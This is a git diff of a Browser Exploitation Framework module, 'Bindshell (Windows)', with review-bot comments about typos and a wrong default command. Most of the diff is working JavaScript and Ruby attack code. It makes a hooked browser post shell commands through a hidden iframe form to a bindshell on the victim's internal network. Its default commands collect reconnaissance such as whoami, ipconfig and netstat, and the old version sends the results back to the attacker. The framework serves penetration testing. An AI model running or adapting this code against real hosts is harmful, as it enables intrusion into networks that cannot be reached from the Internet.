diff --git a/modules/ipec/inter_protocol_win_bindshell/command.js b/modules/ipec/inter_protocol_win_bindshell/command.js index dfc372848..7fbe8b05e 100644 --- a/modules/ipec/inter_protocol_win_bindshell/command.js +++ b/modules/ipec/inter_protocol_win_bindshell/command.js @@ -6,74 +6,41 @@ beef.execute(function() { - var target_ip = "<%= @ip %>"; - var target_port = "<%= @port %>"; - var cmd = "<%= @cmd %>"; - var timeout = "<%= @command_timeout %>"; - var internal_counter = 0; - - cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo \"\" & echo
\"\""; - - var iframe = document.createElement("iframe"); - iframe.setAttribute("id","ipc_win_window_<%= @command_id %>"); - iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;"); - document.body.appendChild(iframe); - - function do_submit(ip, port, content) { - - var action = "http://" + ip + ":" + port + "/index.html?&cmd&"; - var parent = window.location.href; - - myform=document.createElement("form"); - myform.setAttribute("name","data"); - myform.setAttribute("method","post"); - myform.setAttribute("enctype","multipart/form-data"); - myform.setAttribute("action",action); - document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); - - myExt = document.createElement("INPUT"); - myExt.setAttribute("id",<%= @command_id %>); - myExt.setAttribute("name",<%= @command_id %>); - myExt.setAttribute("value",content); - myform.appendChild(myExt); - myExt = document.createElement("INPUT"); - myExt.setAttribute("id","endTag"); - myExt.setAttribute("name","
"); - myExt.setAttribute("value","echo window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);\"\" & exit"); - - myform.appendChild(myExt); - myform.submit(); + // validate payload + try { + var cmd = '<%= @commands.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>'; + } catch(e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString()); + return; } - function waituntilok() { - - try { - if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) { - ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href; - output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__')); - beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "
")).replace(//g, ">").replace(/<br>/gi, "
")); - document.body.removeChild(iframe); - return; - } else throw("command results haven't been returned yet"); - } catch (e) { - internal_counter++; - if (internal_counter > timeout) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds'); - document.body.removeChild(iframe); - return; - } - setTimeout(function() {waituntilok()},1000); - } + // validate target host + var rhost = "<%= @rhost %>"; + if (!rhost) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host'); + return; } - if (!target_port || !target_ip || isNaN(target_port)) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port'); - } else if (target_port > 65535 || target_port < 0) { + // validate target port + var rport = "<%= @rport %>"; + if (!rport || rport > 65535 || rport < 0 || isNaN(rport)) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port'); - } else { - do_submit(target_ip, target_port, cmd); - waituntilok(); + return; } + // validate timeout + var timeout = "<%= @timeout %>"; + if (isNaN(timeout)) timeout = 30; + + // send commands + var win_ipec_form_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html?&cmd&", cmd + " & exit"); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Shell commands sent'); + + // clean up + cleanup = function() { + document.body.removeChild(win_ipec_form_<%= @command_id %>); + } + setTimeout("cleanup()", timeout * 1000); + }); diff --git a/modules/ipec/inter_protocol_win_bindshell/command.old.js b/modules/ipec/inter_protocol_win_bindshell/command.old.js new file mode 100644 index 000000000..909637463 --- /dev/null +++ b/modules/ipec/inter_protocol_win_bindshell/command.old.js 
@@ -0,0 +1,86 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// +// This is the old module which supports bi-directional communications for Firefox before version ~16 +beef.execute(function() { + + var target_ip = "<%= @ip %>"; + var target_port = "<%= @port %>"; + var cmd = "<%= @cmd %>"; + var timeout = "<%= @command_timeout %>"; + var internal_counter = 0; + + cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo \"\" & echo
\"\""; + + var iframe = document.createElement("iframe"); + iframe.setAttribute("id","ipc_win_window_<%= @command_id %>"); + iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;"); + document.body.appendChild(iframe); + + function do_submit(ip, port, content) { + + var action = "http://" + ip + ":" + port + "/index.html?&cmd&"; + var parent = window.location.href; + + myform=document.createElement("form"); + myform.setAttribute("name","data"); + myform.setAttribute("method","post"); + myform.setAttribute("enctype","multipart/form-data"); + myform.setAttribute("action",action); + document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); + + myExt = document.createElement("INPUT"); + myExt.setAttribute("id",<%= @command_id %>); + myExt.setAttribute("name",<%= @command_id %>); + myExt.setAttribute("value",content); + myform.appendChild(myExt); + myExt = document.createElement("INPUT"); + myExt.setAttribute("id","endTag"); + myExt.setAttribute("name","
"); + myExt.setAttribute("value","echo window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);\"\" & exit"); + + myform.appendChild(myExt); + myform.submit(); + } + + function waituntilok() { + + try { + if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) { + ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href; + output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__')); + beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "
")).replace(//g, ">").replace(/<br>/gi, "
")); + document.body.removeChild(iframe); + return; + } else throw("command results haven't been returned yet"); + } catch (e) { + internal_counter++; + if (internal_counter > timeout) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds'); + document.body.removeChild(iframe); + return; + } + setTimeout(function() {waituntilok()},1000); + } + } + + // validate target host + if (!target_ip) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host'); + return; + } + + // validate target port + if (!target_port || target_port > 65535 || target_port < 0 || isNaN(target_port)) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port'); + return; + } + + // send commands + do_submit(target_ip, target_port, cmd); + waituntilok(); + +}); + diff --git a/modules/ipec/inter_protocol_win_bindshell/config.yaml b/modules/ipec/inter_protocol_win_bindshell/config.yaml index 1355edb2b..3240851df 100644 --- a/modules/ipec/inter_protocol_win_bindshell/config.yaml +++ b/modules/ipec/inter_protocol_win_bindshell/config.yaml @@ -9,8 +9,8 @@ beef: enable: true category: "IPEC" name: "Bindshell (Windows)" - description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet." + description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF.

Note: ampersands are required to seperate commands." authors: ["bcoles", "wade"] target: - working: ["FF"] - not_working: ["C", "S", "O", "IE"] + working: ["FF", "C"] + not_working: ["S", "O", "IE"] diff --git a/modules/ipec/inter_protocol_win_bindshell/module.rb b/modules/ipec/inter_protocol_win_bindshell/module.rb index ccb0d9b98..7be2302e3 100644 --- a/modules/ipec/inter_protocol_win_bindshell/module.rb +++ b/modules/ipec/inter_protocol_win_bindshell/module.rb 
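Review bot: The new description text misspells "separate" in its last sentence; it should read `Note: ampersands are required to separate commands.` (the same misspelling is in the `commands` option description in module.rb). Since this description is the text an operator sees, it would also help to carry over the caveat from the module.rb header that the appended `& exit` closes the bindshell unless a persistent listener (netcat `-L`) is used, as that is the reason a second run against the same target fails.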
@@ -4,67 +4,28 @@ # See the file 'doc/COPYING' for copying permission # =begin -[+] Summary: - -Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet. - -The command results are returned to the BeEF control panel. - -[+] Tested: - -o Working: - o Mozilla Firefox 4 - o Mozilla Firefox 5 - -o Not Working: - o Mozilla Firefox 5 with the NoScript extension - o Internet Explorer 8+ - o Chrome 13 - o Opera 11 - o Safari 5 - -[+] Notes: - -o The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue: - - o use the netcat persistent listen "-L" option rather than the listen "-l" option; or - - o remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system. - -o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning: - - [ABE] Deny on {POST http://localhost:4444/index.html?&cmd& <<< about:blank - 7} - SYSTEM rule: - Site LOCAL - Accept from LOCAL - Deny - -o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested. - -o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however. - -o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun. +The bindshell is closed once the module has completed. 
This is necessary otherwise the cmd.exe process will hang. To avoid this issue: + - use the netcat persistent listen "-L" option rather than the listen "-l" option; or + - remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system. +Returning the shell command results is not supported in Firefox ~16+, IE, Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe due to content-type restrictions. The shell commands are executed on the target shell however. =end class Inter_protocol_win_bindshell < BeEF::Core::Command def self.options return [ - {'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'}, - {'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'}, - {'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}, - {'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' } + {'name'=>'rhost', 'ui_label'=>'Target Address', 'value'=>'127.0.0.1'}, + {'name'=>'rport', 'ui_label'=>'Target Port', 'value'=>'4444'}, + {'name'=>'timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}, + {'name'=>'commands','ui_label'=>'Shell Commands', 'description'=>'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' } ] end def post_execute content = {} content['result'] = @datastore['result'] if not @datastore['result'].nil? - content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? - if content.empty? - content['fail'] = 'No data was returned.' 
- end + content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? save content end end
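Review bot: The new default for the `commands` option adds `echo Directory Path: & pwd`, but `pwd` is not a cmd.exe command, so on the Windows bindshell this module targets it prints `'pwd' is not recognized as an internal or external command` instead of a path; use `cd` (which prints the current directory when given no argument) or `echo %CD%`: `'value'=>'echo User: & whoami & echo Directory Path: & cd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an'`. The option description also misspells "separate" as `seperate`. With the `No data was returned.` fallback removed from `post_execute`, a run whose `beef.net.send` never arrives now saves an empty `content` hash silently; if that is intended because the new JS always reports `Shell commands sent`, a one-line comment in `post_execute` saying so would keep the next maintainer from re-adding the fallback.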